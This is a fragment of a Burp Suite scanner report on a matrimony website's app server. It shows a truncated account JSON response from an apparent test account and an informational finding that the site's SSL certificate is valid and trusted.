{"RESPONSECODE":"1","ERRCODE":"0","GENDER":"M","MEMBERTYPE":"F","SENTACCESS":"N","MEMBERSHIPNAME":"","MEMBERST
ATUS":"0","MEMBEREMAIL":"bmtesting34@gmail.com","DAYSOFREGISTRATION":"232","VALIDDAYS":"0","EXPIRYDATE":"2020-05-08
12:22:59","NUMBEROFPAYMENTS":"2","AUTORENEWALSTATUS":"0","POSTFLAG":"0","PROFILECOMPVAL":"79","ENABLEDISCOVER":
"1","DSSIMAGE":"","D
...[SNIP]...
7. SSL certificate
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational.
Server certificate
Issued to: w1.matrimony.com, *.assamesematrimony.com, *.assistedmatrimony.com, *.bengalimatrimony.com,
*.bharatmatrimony.com, *.elitematrimony.com, *.gujaratimatrimony.com, *.hindimatrimony.com,
*.kannadamatrimony.com, *.keralamatrimony.com, *.marathimatrimony.com, *.marwadimatrimony.com,
*.matrimony.com, *.matrimonycdn.com, *.matrimonycorp.com, *.oriyamatrimony.com, *.parsimatrimony.com,
*.punjabimatrimony.com, *.sindhimatrimony.com, *.tamilmatrimony.com, *.telugumatrimony.com,
*.urdumatrimony.com, assamesematrimony.com, assistedmatrimony.com, bengalimatrimony.com,
bharatmatrimony.com, elitematrimony.com, gujaratimatrimony.com, hindimatrimony.com, kannadamatrimony.com,
keralamatrimony.com, marathimatrimony.com, marwadimatrimony.com, matrimony.com, matrimonycdn.com,
matrimonycorp.com, oriyamatrimony.com, parsimatrimony.com, punjabimatrimony.com, sindhimatrimony.com,
tamilmatrimony.com, telugumatrimony.com, urdumatrimony.com
Issued by: GlobalSign RSA OV SSL CA 2018
Valid from: Thu Nov 21 15:47:02 IST 2019
Valid to: Sun Feb 06 13:06:04 IST 2022
Certificate chain #1
Issued to: GlobalSign RSA OV SSL CA 2018
Issued by: GlobalSign
Valid from: Wed Nov 21 05:30:00 IST 2018
Valid to: Tue Nov 21 05:30:00 IST 2028
Certificate chain #2
Issued to: GlobalSign
Issued by: GlobalSign
Valid from: Wed Mar 18 15:30:00 IST 2009
Valid to: Sun Mar 18 15:30:00 IST 2029
Issue background
SSL (or TLS) helps to protect the confidentiality and integrity of information in transit between the browser and server, and
to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate that is
valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these
requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.
It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections in
particular. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without
user detection even when a valid SSL certificate is used.
References
· SSL/TLS Configuration Guide
Vulnerability classifications
· CWE-295: Improper Certificate Validation
· CWE-326: Inadequate Encryption Strength
· CWE-327: Use of a Broken or Risky Cryptographic Algorithm
Report generated by Burp Suite web vulnerability scanner v1.7.35, at Tue May 19 23:30:27 IST 2020.